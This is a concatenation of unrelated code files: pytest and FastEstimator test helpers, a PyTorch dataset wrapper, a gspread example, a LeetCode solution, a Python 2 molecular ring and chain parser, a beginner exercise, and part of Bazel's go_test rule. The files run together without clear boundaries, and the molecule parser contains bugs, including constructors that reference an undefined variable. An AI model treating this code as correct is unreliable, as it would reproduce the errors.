pytest.Function): # We *could* be more specific, e.g. "method", "subtest". return 'function', False else: return None, False ############################# # useful for debugging _FIELDS = [ 'nodeid', 'kind', 'class', 'name', 'fspath', 'location', 'function', 'markers', 'user_properties', 'attrnames', ] def _summarize_item(item): if not hasattr(item, 'nodeid'): yield 'nodeid', item return for field in _FIELDS: try: if field == 'kind': yield field,_get_item_kind(item) elif field == 'class': yield field, item.__class__.__name__ elif field == 'markers': yield field, item.own_markers #yield field, list(item.iter_markers()) elif field == 'attrnames': yield field, dir(item) else: yield field, getattr(item, field, '') except Exception as exc: yield field, '' def _debug_item(item, showsummary=False): item._debugging = True try: summary = dict(_summarize_item(item)) finally: item._debugging = False if showsummary: print(item.nodeid) for key in ('kind', 'class', 'name', 'fspath', 'location', 'func', 'markers', 'props'): print(' {:12} {}'.format(key, summary[key])) print() return summary exclude.py #!/usr/local/bin/python3.7 """ Module to exclude 'bad' experimental runs. Mostly repeated runs where the previous set of data used a bad tip size. 
""" import os def exclusions(): f = "excludes.txt" e = [] if os.path.exists(f): e = [ int(l.strip()) for l in open(f).readlines()] return e0 """Error definitions.""" class BitvavoException(Exception): """Raised when API error occurs.""" def __init__(self, status_code, message): self.status_code = status_code self.message = message def __str__(self): # pragma: no cover return "Error(code=%s): %s" % (self.status_code, self.message) import torch.utils.data class LimitLength(torch.utils.data.Dataset): def __init__(self, dataset: torch.utils.data.Dataset, max_length: int, get_length=lambda x: x["in_len"]) -> None: super().__init__() self.dataset = dataset self.indices = [i for i in range(len(dataset)) if get_length(dataset[i]) <= max_length] def __len__(self) -> int: return len(self.indices) def __getitem__(self, index): return self.dataset[self.indices[index]] def __getattr__(self, item): return getattr(self.dataset, item) import os import unittest import matplotlib import numpy as np import tensorflow as tf from fastestimator.test.unittest_util import check_img_similar, fig_to_rgb_array, img_to_rgb_array from fastestimator.util import ImgData class TestImageData(unittest.TestCase): @classmethod def setUpClass(cls): cls.output_img = os.path.abspath(os.path.join(__file__, "..", "resources", "test_img_data_paintfig.png")) cls.input_image_shape = (150, 150) cls.label_shape = (4, ) cls.x_test = 0.5 * tf.ones((4, 150, 150, 3)) cls.y_test = tf.ones(cls.label_shape) cls.img_data = ImgData(y=cls.y_test, x=cls.x_test) def setUp(self) -> None: self.old_backend = matplotlib.get_backend() matplotlib.use("Agg") def tearDown(self) -> None: matplotlib.use(self.old_backend) def test_n_cols(self): self.assertEqual(self.img_data._n_cols(), 2) def test_n_rows(self): self.assertEqual(self.img_data._n_rows(), 1) def test_shape_to_width_1d(self): self.assertEqual(self.img_data._shape_to_width(self.label_shape, min_width=300), 300, 'Output should be equal to minimum width') def test_shape_to_width_2d(self): self.assertEqual(self.img_data._shape_to_width(self.input_image_shape, min_width=100), 150, 'Output should be equal to input width') def test_shape_to_height_1d(self): self.assertEqual(self.img_data._shape_to_height(self.label_shape, min_height=300), 300, 'Output should be equal to minimum height') def test_shape_to_height_2d(self): self.assertEqual(self.img_data._shape_to_height(self.input_image_shape, min_height=150), 150, 'Output should be equal to input height') def test_img_data_widths(self): index = 0 self.assertEqual(self.img_data._widths(index), [(0, 200), (250, 450)]) def test_img_data_total_width(self): self.assertEqual(self.img_data._total_width(), 450) def test_img_data_heights(self): self.assertEqual(self.img_data._heights(), [(10, 810)]) def test_img_data_total_height(self): self.assertEqual(self.img_data._total_height(), 840) def test_img_data_batch_size(self): self.assertEqual(self.img_data._batch_size(0), 4) def test_paint_figure(self): fig = self.img_data.paint_figure() output = img_to_rgb_array(self.output_img) output_test = fig_to_rgb_array(fig) self.assertTrue(check_img_similar(output, output_test)) def test_paint_numpy(self): output_test = self.img_data.paint_numpy() output_test = np.squeeze(output_test, axis=0) output = img_to_rgb_array(self.output_img) self.assertTrue(check_img_similar(output, output_test)) 1-10 # import libraries import gspread from oauth2client.service_account import ServiceAccountCredentials # assign a scope scope = ['https://spreadsheets.google.com/feeds', 
'https://www.googleapis.com/auth/drive'] # create credentials credaccess = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope) # authorize a gspread client client = gspread.authorize(credaccess) # access Google Sheets by calling client.open sheet = client.open('My Spreadsheet').sheet1 # set data to all records in sheet 1 data = sheet.get_all_records() # print to terminal print(data) Problems/Study Plans/Data Structure/Data Structure II/65_minimum_remove_to_make_valid_parentheses.py # https://leetcode.com/problems/minimum-remove-to-make-valid-parentheses/ class Solution: def minRemoveToMakeValid(self, s: str) -> str: indexes_to_remove = set() unclosed_open_parentheses_indexes = list() for idx, char in enumerate(s): if char == '(': unclosed_open_parentheses_indexes.append(idx) elif char == ')': if unclosed_open_parentheses_indexes: unclosed_open_parentheses_indexes.pop() else: indexes_to_remove.add(idx) indexes_to_remove.update(unclosed_open_parentheses_indexes) result = list() for idx, char in enumerate(s): if idx not in indexes_to_remove: result.append(char) return ''.join(result) #! /usr/bin/env python from momo import sys, np, osio, endl, flush from __qmshell__ import e_xyz_from_xyz from __molecules__ import Atom, Molecule osio.Connect() osio.AddArg('file', typ=str, default=None, help='Input xyz-file') osio.AddArg('molname', typ=str, default='UNSCRAMBLED', help='Molecule name') osio.AddArg('gro', typ=str, default='', help='Output gro-file') osio.AddArg('xyz', typ=str, default='', help='Output xyz-file') osio.AddArg('ring_exclude', typ=(list, str), default=['Al','Zn'], help='Exclude these atoms from ring structure') opts, xopts = osio.Parse() xyzfile = opts.file molname = opts.molname outfile_xyz = opts.xyz outfile_gro = opts.gro exclude_bonds_to = opts.ring_exclude wordy = False leaky = False # COVALENCE RADII (from Cambridge Structural Database, table see http://en.wikipedia.org/wiki/Covalent_radius) COVRAD_TABLE = {} COVRAD_TABLE['H'] = 0.31 COVRAD_TABLE['C'] = 0.76 COVRAD_TABLE['N'] = 0.71 COVRAD_TABLE['O'] = 0.66 COVRAD_TABLE['Se'] = 1.20 COVRAD_TABLE['S'] = 1.05 COVRAD_TABLE['Zn'] = 1.22 # FORCEFIELD TYPE TABLE TYPE_TABLE = {\ 'C:CCH' : 'CA', # Aromatic 'C:CCN' : 'CA', # Aromatic + Nitrogen (TODO) 'C:CHS' : 'CA', # 'C:CCSe' : 'CB', # Aromatic + Selenium (TODO) 'C:CCS' : 'CB', # Aromatic + Sulphur 'C:CCO' : 'CO', # Aromatic + Carboxylic 'C:CNSe' : 'CS', # Aromatic + Selenium + Nitrogen (TODO) 'C:CCHH' : 'CR', # Aliphatic 'C:CHHN' : 'CR', # Aliphatic 'C:CHHH' : 'CR', # Methyl 'C:CCC' : 'CC', # 'C:CN' : 'CN', # Cyano-group (TODO) 'H:C' : 'HC', # 'N:CCC' : 'NA', # Aromatic 'N:C' : 'NC', # 'O:C' : 'OC', # Carboxylic group 'S:CC' : 'S', # Thiophene sulphur 'Se:CC' : 'Se'} # ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' NUMBERS = '1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' class AtomXyz(object): def __init__(self, e, xyz, id): # PROPERTIES self.e = e self.id = id self.xyz = xyz self.x = xyz[0] self.y = xyz[1] self.z = xyz[2] self.covrad = COVRAD_TABLE[self.e] if self.e in exclude_bonds_to: self.covrad = 0.0 # FRAGMENT INFO self.name = '' self.type = '' self.fragname = '___' self.fragid = 0 # BONDING LEVEL (-1 = CORE) self.level = -1 # ALL BONDS self.bonded = [] self.bonded_short = [] # CORE BONDS self.bonded_core = [] self.bonds_core = [] # NON-RING CORE BONDS self.bonded_non_ring = [] self.bonds_non_ring = [] # DOCKED self.docked_to = [] self.dock_for = [] # PATHS OF SOME LENGTH self.path_length = -1 self.paths = [] # 
NON-RING PATHS OF SOME LENGTH self.path_length_non_ring = -1 self.paths_non_ring = [] def generate_type(self): type_key = '' bonded_elems = [] for b in self.bonded: bonded_elems.append(b.e) bonded_elems.sort() for e in bonded_elems: type_key += e type_key = self.e + ':' + type_key try: self.type = TYPE_TABLE[type_key] except KeyError: default_type = self.e+'X' print "Type definition missing for '%s', defaulting to '%s'" % (type_key, default_type) self.type = default_type return def get_all_docked_atoms(self): docked_atoms = [] docked_atoms = docked_atoms + self.dock_for for d in self.dock_for: docked_atoms = docked_atoms + d.get_all_docked_atoms() return docked_atoms def add_bond_core(self, bonded_atom, bond): self.bonded_core.append(bonded_atom) self.bonds_core.append(bond) return def add_bond_non_ring(self, bonded_atom, bond): self.bonded_non_ring.append(bonded_atom) self.bonds_non_ring.append(bond) return def find_paths(self, length, exclusion_list=[], start_here=True): if length == 0: return [] paths = [] #exclusion_list.append(self) for bond in self.bonds_core: new_path = Path(start_with_atom=self if start_here else None) if not bond.b in exclusion_list: new_path.extend(bond) paths.append(new_path) other = bond.b #other_paths = other.find_paths(length=length-1, exclusion_list=exclusion_list, start_here=False) other_paths = other.find_paths(length=length-1, exclusion_list=[self], start_here=False) for o in other_paths: joined = JoinPaths(new_path, o) paths.append(joined) if start_here: self.path_length = length self.paths = paths return paths def find_paths_non_ring(self, length=4, exclusion_list=[], start_here=True): if length == 0: return [] paths = [] #exclusion_list.append(self) for bond in self.bonds_non_ring: new_path = Path(start_with_atom=self if start_here else None) if not bond.b in exclusion_list: new_path.extend(bond) paths.append(new_path) other = bond.b #other_paths = other.find_paths(length=length-1, exclusion_list=exclusion_list, start_here=False) other_paths = other.find_paths_non_ring(length=length-1, exclusion_list=[self], start_here=False) for o in other_paths: joined = JoinPaths(new_path, o) paths.append(joined) if start_here: self.path_length_non_ring = length self.paths_non_ring = paths return paths class Path(object): def __init__(self, start_with_atom=None): self.visited = [] if start_with_atom != None: self.visited.append(start_with_atom) self.bonds = [] def add_visited(self, v): self.visited.append(v) def add_bond(self, b): self.bonds.append(b) def extend(self, bond): self.add_visited(bond.b) self.add_bond(bond) def print_info(self): for v in self.visited: print "[%d:%s]" % (v.id,v.e), print "" def get_first(self): return self.visited[0] def get_last(self): return self.visited[-1] class BondXyz(object): def __init__(self, atom1, atom2): self.a = atom1 self.b = atom2 def JoinPaths(path1, path2): joined_path = Path() joined_path.visited = path1.visited + path2.visited joined_path.bonds = path1.bonds + path2.bonds return joined_path class Ring(object): def __init__(self, first_pair=None): self.atoms = [] self.bonded_structures = [] if first_pair != None: self.atoms.append(pair[0]) self.atoms.append(pair[1]) def type(self): return "ring" def has_atom(self, atom): return self.check_atom(atom) def check_atom(self, atom): if atom in self.atoms: return True else: return False def check_add_pair(self, pair): has_a = self.check_atom(pair[0]) has_b = self.check_atom(pair[1]) if has_a and not has_b: self.atoms.append(pair[1]) return True elif has_b and not has_a: 
self.atoms.append(pair[0]) return True elif has_b and has_a: return True else: return False def print_info(self): for a in self.atoms: print "%2d" % a.id, print "" def intersects(self, other): intersects = False for a in self.atoms: if a in other.atoms: intersects = True break return intersects def add(self, other): for atom in other.atoms: if not atom in self.atoms: self.atoms.append(atom) return def find_round_trip_path(self, visited=[], start_atm=None): started_here = False if start_atm == None: self.atoms = sorted(self.atoms, key=lambda atm: len(atm.bonded)) start_atm = self.atoms[0] visited.append(start_atm) started_here = True for bond in start_atm.bonds_core: # Backup visited list to be able to revert to this point visited_0 = [] for v in visited: visited_0.append(v) if bond.b in visited or not bond.b in self.atoms: continue # Partner atom not yet visited, proceed visited.append(bond.b) visited = self.find_round_trip_path(visited, bond.b) # All atoms visited = round path? if len(visited) == len(self.atoms): break # A dead end. Revert & try next bond else: visited = [] for v in visited_0: visited.append(v) #assert len(visited) <= len(self.atoms) if started_here: if len(visited) != len(self.atoms): osio << osio.mr << "WARNING Failed to generate round-trip path (atom order will be compromised)" << endl visited = self.atoms else: if wordy: osio << "Found round-trip path" << endl return visited def order_atoms(self): self.atoms = self.find_round_trip_path(visited=[], start_atm=None) return def get_all_bonded_structures(self, exclude_list=[]): bonded = [] exclude_list.append(self) for b in self.bonded_structures: if b in exclude_list: continue bonded.append(b) bonded = bonded + b.get_all_bonded_structures(exclude_list) return bonded def JoinRings(ring1, ring2): joined_ring = Ring() for a in ring1.atoms: joined_ring.atoms.append(a) for b in ring2.atoms: if not joined_ring.has_atom(b): joined_ring.atoms.append(b) return class Chain(object): def __init__(self, first_pair=None): self.atoms = [] self.bonded_structures = [] if first_pair != None: self.atoms.append(pair[0]) self.atoms.append(pair[1]) def type(self): return "chain" def has_atom(self, atom): return self.check_atom(atom) def intersects(self, other): intersects = False for a in self.atoms: if a in other.atoms: intersects = True break return intersects def add(self, other): for atom in other.atoms: if not atom in self.atoms: self.atoms.append(atom) return def print_info(self): for a in self.atoms: print "%2d" % a.id, print "" def find_round_trip_path(self, visited=[], start_atm=None): started_here = False if start_atm == None: self.atoms = sorted(self.atoms, key=lambda atm: len(atm.bonded)) start_atm = self.atoms[0] visited.append(start_atm) started_here = True for bond in start_atm.bonds_core: # Backup visited list to be able to revert to this point visited_0 = [] for v in visited: visited_0.append(v) if bond.b in visited or not bond.b in self.atoms: continue # Partner atom not yet visited, proceed visited.append(bond.b) visited = self.find_round_trip_path(visited, bond.b) # All atoms visited = round path? if len(visited) == len(self.atoms): break # A dead end. 
Revert & try next bond else: visited = [] for v in visited_0: visited.append(v) #assert len(visited) <= len(self.atoms) if started_here: if len(visited) != len(self.atoms): osio << osio.mr << "WARNING Failed to generate round-trip path (atom order will be compromised)" << endl visited = self.atoms else: if wordy: osio << "Found round-trip path" << endl return visited def order_atoms(self): self.atoms = self.find_round_trip_path(visited=[], start_atm=None) return def get_all_bonded_structures(self, exclude_list=[]): bonded = [] exclude_list.append(self) for b in self.bonded_structures: if b in exclude_list: continue bonded.append(b) bonded = bonded + b.get_all_bonded_structures(exclude_list) return bonded def CreateMolecule(name, atoms, xyz_conv_fact=0.1): molecule = Molecule(0, name) for atom in atoms: gro_atom = Atom(ln='') gro_atom.fragId = atom.fragid gro_atom.fragName = atom.fragname gro_atom.name = atom.name gro_atom.Id = atom.id gro_atom.pos = np.array(atom.xyz)*xyz_conv_fact gro_atom.vel = None molecule.append_atom(gro_atom) return molecule # LOAD ATOMS atoms = [] e,xyz = e_xyz_from_xyz(xyzfile) count = 0 for e,r in zip(e,xyz): count += 1 atoms.append(AtomXyz(e,r,count)) # ESTABLISH BONDING VIA COVALENCE CRITERION osio << osio.mg << "Find bonds using covalence criterion" << endl bond_count = 0 for i in range(len(atoms)): for j in range(i+1, len(atoms)): a = atoms[i] b = atoms[j] dr = np.dot(a.xyz-b.xyz,a.xyz-b.xyz)**0.5 dv = 1.1*(a.covrad+b.covrad) if dr < dv: bond_count += 1 a.bonded.append(b) b.bonded.append(a) print "%d bonds in molecule" % bond_count if leaky: for a in atoms: print "%2s bonded to %d" % (a.e, len(a.bonded)) for a in atoms: if len(a.bonded) == 0: osio << osio.my << "NOTE: Unbonded atom" << a.e << a.id << endl # SEQUENTIALLY SPLIT OFF LIGAND UNITS osio << osio.mg << "Find core using sequential reduction" << endl short_list = [] for a in atoms: short_list.append(a) selection_levels = [] this_level = 0 while True: if leaky: print "Level", this_level print "Short-listed", len(short_list) for a in short_list: a.bonded_short = [] for i in range(len(short_list)): for j in range(i+1, len(short_list)): a = short_list[i] b = short_list[j] dr = np.dot(a.xyz-b.xyz,a.xyz-b.xyz)**0.5 dv = 1.1*(a.covrad+b.covrad) if dr < dv: a.bonded_short.append(b) b.bonded_short.append(a) rm_atoms = [] for s in short_list: if len(s.bonded_short) == 1: rm_atoms.append(s) if len(rm_atoms) == 0: break if leaky: print "Removing", len(rm_atoms) for r in rm_atoms: r.level = this_level for b in r.bonded_short: b.dock_for.append(r) r.docked_to.append(b) short_list.remove(r) if leaky: ofs = open('level_%d.xyz' % this_level, 'w') ofs.write('%d\n\n' % len(short_list)) for s in short_list: ofs.write('%s %+1.7f %+1.7f %+1.7f\n' % (s.e, s.x, s.y, s.z)) ofs.close() this_level += 1 # READ OFF CORE ATOMS core = [] for a in atoms: assert len(a.docked_to) <= 1 docked_atoms = a.get_all_docked_atoms() if wordy: osio << "%-2s bonded to %d, docked to %d, dock for %d/%-2d at level %+d" \ % (a.e, len(a.bonded), len(a.docked_to), len(a.dock_for), len(docked_atoms), a.level) << endl if len(a.docked_to) < 1: core.append(a) print "%d atoms in core" % len(core) # ESTABLISH BONDING AMONG CORE ATOMS osio << osio.mg << "Find core-atom bonds using covalence criterion" << endl bonds = [] for i in range(len(core)): for j in range(i+1, len(core)): a = core[i] b = core[j] dr = np.dot(a.xyz-b.xyz,a.xyz-b.xyz)**0.5 dv = 1.1*(a.covrad+b.covrad) if dr < dv: a.bonded_short.append(b) b.bonded_short.append(a) bond_ab = BondXyz(a,b) 
bond_ba = BondXyz(b,a) a.add_bond_core(b, bond_ab) b.add_bond_core(a, bond_ba) bonds.append(bond_ab) print "%d bonds in core" % len(bonds) # GENERATE PATHS ALONG CORE BONDS path_cutoff_length = 7 osio << osio.mg << "Find connecting paths (max. length %d)" % path_cutoff_length << endl path_count = 0 for c in core: paths = c.find_paths(length=path_cutoff_length, exclusion_list=[], start_here=True) if wordy: osio << "%2d paths of length <= %d from atom %2d" % (len(paths), path_cutoff_length, c.id) << endl if leaky: for p in paths: p.print_info() path_count += len(paths) osio << "Generated a total of %d bond paths" % path_count << endl # FROM PATHS FIND RING-CONNECTED ATOMS ring_pairs = [] for i in range(len(core)): for j in range(i+1, len(core)): a = core[i] b = core[j] paths_ab = [] for p in a.paths: if p.get_last() == b: paths_ab.append(p) paths_ba = [] for p in b.paths: if p.get_last() == a: paths_ba.append(p) if leaky: print "ID1 %d ID2 %d" % (a.id, b.id) print "a => b: %d" % len(paths_ab) #for p in paths_ab: # p.print_info() print "b => a: %d" % len(paths_ba) #for p in paths_ba: # p.print_info() assert len(paths_ab) == len(paths_ba) if len(paths_ab) == 1: continue has_disjoint_paths = False for k in range(len(paths_ab)): for l in range(k+1, len(paths_ab)): intersects = False p1 = paths_ab[k] p2 = paths_ab[l] b1 = p1.bonds b2 = p2.bonds for bond in b1: if bond in b2: intersects = True if not intersects: has_disjoint_paths = True if has_disjoint_paths: pair = [a,b] ring_pairs.append(pair) if leaky: osio << osio.mg << "Ring pair:" << a.id-1 << b.id-1 << endl # FROM RING PAIRS, FIND RINGS VIA SUCCESSIVE ADDITION osio << osio.mg << "Find rings using set of ring pairs" << endl rings = [] for pair in ring_pairs: new_ring = Ring(first_pair=pair) rings.append(new_ring) i = 0 while i <= len(rings)-1: ring = rings[i] rm_rings = [] for j in range(i+1, len(rings)): other = rings[j] if ring.intersects(other): rm_rings.append(other) ring.add(other) for r in rm_rings: rings.remove(r) i += 1 osio << "Core rings (# = %d)" % len(rings) << endl if wordy: for r in rings: r.print_info() # READ OFF NON-RING ATOMS non_ring_core_atoms = [] for c in core: in_ring = False for r in rings: if r.has_atom(c): in_ring = True if not in_ring: non_ring_core_atoms.append(c) osio << "Non-ring core atoms: %d" % len(non_ring_core_atoms) << endl # ESTABLISH BONDING AMONG NON-RING CORE ATOMS osio << osio.mg << "Find non-ring core-atom bonds using covalence criterion" << endl bonds = [] for i in range(len(non_ring_core_atoms)): for j in range(i+1, len(non_ring_core_atoms)): a = non_ring_core_atoms[i] b = non_ring_core_atoms[j] dr = np.dot(a.xyz-b.xyz,a.xyz-b.xyz)**0.5 dv = 1.1*(a.covrad+b.covrad) if dr < dv: a.bonded_short.append(b) b.bonded_short.append(a) bond_ab = BondXyz(a,b) bond_ba = BondXyz(b,a) a.add_bond_non_ring(b, bond_ab) b.add_bond_non_ring(a, bond_ba) bonds.append(bond_ab) print "%d bonds in non-ring core" % len(bonds) # GENERATE PATHS ALONG NON-RING CORE BONDS path_cutoff_length = 7 osio << osio.mg << "Find connecting non-ring paths (max. 
length %d)" % path_cutoff_length << endl path_count = 0 for c in non_ring_core_atoms: paths = c.find_paths_non_ring(length=path_cutoff_length, exclusion_list=[], start_here=True) if wordy: print "%2d paths of length <= %d from atom %2d" % (len(paths), path_cutoff_length, c.id) if leaky: for p in paths: p.print_info() path_count += len(paths) osio << "Generated a total of %d non-ring bond paths" % path_count << endl # FROM PATHS FIND NON-RING-CONNECTED ATOMS non_ring_pairs = [] for i in range(len(non_ring_core_atoms)): for j in range(i+1, len(non_ring_core_atoms)): a = non_ring_core_atoms[i] b = non_ring_core_atoms[j] paths_ab = [] for p in a.paths_non_ring: if p.get_last() == b: paths_ab.append(p) paths_ba = [] for p in b.paths_non_ring: if p.get_last() == a: paths_ba.append(p) if leaky: print "ID1 %d ID2 %d" % (a.id, b.id) print "a => b: %d" % len(paths_ab) #for p in paths_ab: # p.print_info() print "b => a: %d" % len(paths_ba) #for p in paths_ba: # p.print_info() assert len(paths_ab) == len(paths_ba) assert len(paths_ab) <= 1 if len(paths_ab) > 0: pair = [a,b] non_ring_pairs.append(pair) if leaky: osio << osio.mg << "Non-ring pair:" << a.id-1 << b.id-1 << endl # FROM NON-RING PAIRS, FIND NON-RINGS (= CHAINS) VIA SUCCESSIVE ADDITION osio << osio.mg << "Find non-ring structures using set of non-ring pairs" << endl chains = [] for pair in non_ring_pairs: new_chain = Chain(first_pair=pair) chains.append(new_chain) i = 0 while i <= len(chains)-1: chain = chains[i] rm_chains = [] for j in range(i+1, len(chains)): other = chains[j] if chain.intersects(other): rm_chains.append(other) chain.add(other) for r in rm_chains: chains.remove(r) i += 1 if len(chains) == 0: for atom in non_ring_core_atoms: new_chain = Chain() new_chain.atoms.append(atom) chains.append(new_chain) osio << "Core chains (# = %d)" % len(chains) << endl if wordy: for c in chains: c.print_info() # REORDER STRUCTURAL ELEMENTS (CORE RINGS & CORE CHAINS) molecule = [] structures = rings + chains for i in range(len(structures)): for j in range(i+1, len(structures)): s1 = structures[i] s2 = structures[j] bond_count = 0 for a in s1.atoms: for b in s2.atoms: dr = np.dot(a.xyz-b.xyz,a.xyz-b.xyz)**0.5 dv = 1.1*(a.covrad+b.covrad) if dr < dv: bond_count += 1 assert bond_count <= 1 if bond_count: s1.bonded_structures.append(s2) s2.bonded_structures.append(s1) start_struct_idx = 0 if len(structures) == 1: pass else: structures = sorted(structures, key=lambda s: len(s.bonded_structures)) while structures[start_struct_idx].bonded_structures == []: molecule.append(structures[start_struct_idx]) if start_struct_idx+1 == len(structures): break start_struct_idx += 1 start_struct = structures[start_struct_idx] docked_structures = start_struct.get_all_bonded_structures(exclude_list=[]) molecule = molecule + [start_struct] + docked_structures # REORDER ATOMS IN EACH STRUCTURE for struct in molecule: print "Structure type %-10s" % ("'%s'" % struct.type()), "(bonded to %d)" % len(struct.bonded_structures) struct.order_atoms() # GENERATE ATOM TYPES osio << osio.mg << "Assign atom types" << endl frag_atom_type_count = {} for atm in atoms: atm.generate_type() frag_atom_type_count[atm.type] = 0 # SORT ATOMS AND ASSIGN FRAGMENT NAMES & IDs osio << osio.mg << "Sort atoms, assign fragment names & IDs" << endl atoms_ordered = [] frag_count = 0 core_count = 0 ligand_count = 0 core_alphabet_index = 0 ligand_alphabet_index = 1 for struct in molecule: # Core atoms frag_count += 1 core_count += 1 ligand_sets = [] # Reset fragment atom-type counter for key in 
frag_atom_type_count.keys(): frag_atom_type_count[key] = 0 osio << "Core '%s' (size: %d)" % (ALPHABET[core_count-1], len(struct.atoms)) << endl for atm in struct.atoms: atm.fragid = frag_count atm.fragname = 'CO' + ALPHABET[core_count-1] atm.name = atm.type + NUMBERS[frag_atom_type_count[atm.type]] frag_atom_type_count[atm.type] += 1 atoms_ordered.append(atm) docked = atm.get_all_docked_atoms() if len(docked) <= 4: for datm in docked: datm.fragid = frag_count datm.fragname = 'CO' + ALPHABET[core_count-1] datm.name = datm.type + NUMBERS[frag_atom_type_count[datm.type]] atoms_ordered.append(datm) else: ligand_sets.append(docked) # Reset fragment atom-type counter for key in frag_atom_type_count.keys(): frag_atom_type_count[key] = 0 # Ligand atoms for lset in ligand_sets: frag_count += 1 ligand_count += 1 osio << "Ligand '%s' (size: %d)" % (ALPHABET[core_count-1], len(struct.atoms)) << endl for atm in lset: atm.fragid = frag_count atm.fragname = 'LI' + ALPHABET[core_count-1] atm.name = atm.type + NUMBERS[frag_atom_type_count[atm.type]] frag_atom_type_count[atm.type] += 1 atoms_ordered.append(atm) # FIX ATOM IDs atom_count = 0 for atom in atoms_ordered: atom_count += 1 atom.id = atom_count # OUTPUT XYZ if outfile_xyz != '': ofs = open(outfile_xyz, 'w') ofs.write('%d\n\n' % len(atoms_ordered)) for atm in atoms_ordered: if wordy: print atm.e, atm.fragname, atm.fragid, atm.type, atm.name ofs.write('%-2s %+1.7f %+1.7f %+1.7f\n' % (atm.e, atm.x, atm.y, atm.z)) ofs.close() # OUTPUT GRO if outfile_gro != '': molecule = CreateMolecule(molname, atoms_ordered) molecule.write_gro(outfile_gro) EstruturaDeRepeticao/09.py ''' 9. Faça um programa que imprima na tela apenas os números ímpares entre 1 e 50. ''' for j in range(1, 50): if j % 2 == 1: print(j, end=' ') go/private/rules/test.bzl1000+ # Copyright 2014 The Bazel Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. load( "//go/private:context.bzl", "go_context", ) load( "//go/private:common.bzl", "as_list", "asm_exts", "cgo_exts", "go_exts", "pkg_dir", "split_srcs", ) load( "//go/private/rules:binary.bzl", "gc_linkopts", ) load( "//go/private:providers.bzl", "GoArchive", "GoLibrary", "GoSource", "INFERRED_PATH", "get_archive", ) load( "//go/private/rules:transition.bzl", "go_transition_rule", ) load( "//go/private:mode.bzl", "LINKMODE_NORMAL", ) load( "@bazel_skylib//lib:structs.bzl", "structs", ) def _testmain_library_to_source(go, attr, source, merge): source["deps"] = source["deps"] + [attr.library] def _go_test_impl(ctx): """go_test_impl implements go testing. 
It emits an action to run the test generator, and then compiles the test into a binary.""" go = go_context(ctx) # Compile the library to test with internal white box tests internal_library = go.new_library(go, testfilter = "exclude") internal_source = go.library_to_source(go, ctx.attr, internal_library, ctx.coverage_instrumented()) internal_archive = go.archive(go, internal_source) go_srcs = split_srcs(internal_source.srcs).go # Compile the library with the external black box tests external_library = go.new_library( go, name = internal_library.name + "_test", importpath = internal_library.importpath + "_test", testfilter = "only", ) external_source = go.library_to_source(go, struct( srcs = [struct(files = go_srcs)], embedsrcs = [struct(files = internal_source.embedsrcs)], deps = internal_archive.direct + [internal_archive], x_defs = ctx.attr.x_defs, ), external_library, ctx.coverage_instrumented()) external_source, internal_archive = _recompile_external_deps(go, external_source, internal_archive, [t.label for t in ctx.attr.embed]) external_archive = go.archive(go, external_source) external_srcs = split_srcs(external_source.srcs).go # now generate the main function if ctx.attr.rundir: if ctx.attr.rundir.startswith("/"): run_dir = ctx.attr.rundir else: run_dir = pkg_dir(ctx.label.workspace_root, ctx.attr.rundir) else: run_dir = pkg_dir(ctx.label.workspace_root, ctx.label.package) main_go = go.declare_file(go, path = "testmain.go") arguments = go.builder_args(go, "gentestmain") arguments.add("-output", main_go) if ctx.configuration.coverage_enabled: arguments.add("-coverage") arguments.add( # the l is the alias for the package under test, the l_test must be the # same with the test suffix "-import", "l=" + internal_source.library.importpath, ) arguments.add( "-import", "l_test=" + external_source.library.importpath, ) arguments.add("-pkgname", internal_source.library.importpath) arguments.add_all(go_srcs, before_each = "-src", format_each = "l=%s") ctx.actions.run( inputs = go_srcs, outputs = [main_go], mnemonic = "GoTestGenTest", executable = go.toolchain._builder, arguments = [arguments], ) test_gc_linkopts = gc_linkopts(ctx) if not go.mode.debug: # Disable symbol table and DWARF generation for test binaries. test_gc_linkopts.extend(["-s", "-w"]) # Link in the run_dir global for bzltestutil test_gc_linkopts.extend(["-X", "github.com/bazelbuild/rules_go/go/tools/bzltestutil.RunDir=" + run_dir]) # Now compile the test binary itself test_library = GoLibrary( name = go.label.name + "~testmain", label = go.label, importpath = "testmain", importmap = "testmain", importpath_aliases = (), pathtype = INFERRED_PATH, is_main = True, resolve = None, ) test_deps = external_archive.direct + [external_archive] + ctx.attr._testmain_additional_deps if ctx.configuration.coverage_enabled: test_deps.append(go.coverdata) test_source = go.library_to_source(go, struct( srcs = [struct(files = [main_go])], deps = test_deps, ), test_library, False) test_archive, executable, runfiles = go.binary( go, name = ctx.label.name, source = test_source, test_archives = [internal_archive.data], gc_linkopts = test_gc_linkopts, version_file = ctx.version_file, info_file = ctx.info_file, ) # Bazel only looks for coverage data if the test target has an # InstrumentedFilesProvider. If the provider is found and at least one # source file is present, Bazel will set the COVERAGE_OUTPUT_FILE # environment variable during tests and will save that file to the build # events + test outputs. 
return [ test_archive, DefaultInfo( files = depset([executable]), runfiles = runfiles, executable = executable, ), OutputGroupInfo( compilation_outputs = [internal_archive.data.file], ), coverage_common.instrumented_files_info( ctx, source_attributes = ["srcs"], dependency_attributes = ["deps", "embed"], extensions = ["go"], ), ] _go_test_kwargs = { "implementation": _go_test_impl, "attrs": { "data": attr.label_list(allow_files = True), "srcs": attr.label_list(allow_files = go_exts + asm_exts + cgo_exts), "deps": attr.label_list(providers = [GoLibrary]), "embed": attr.label_list(providers = [GoLibrary]), "embedsrcs": attr.label_list(allow_files = True), "importpath": attr.string(), "gc_goopts": attr.string_list(), "gc_linkopts": attr.string_list(), "rundir": attr.string(), "x_defs": attr.string_dict(), "linkmode": attr.string(default = LINKMODE_NORMAL), "cgo": attr.bool(), "cdeps": attr.label_list(), "cppopts": attr.string_list(), "copts": attr.string_list(), "cxxopts": attr.string_list(), "clinkopts": attr.string_list(), "_go_context_data": attr.label(default = "//:go_context_data"), "_testmain_additional_deps": attr.label_list( providers = [GoLibrary], default = ["@io_bazel_rules_go//go/tools/bzltestutil"], ), # Workaround for bazelbuild/bazel#6293. See comment in 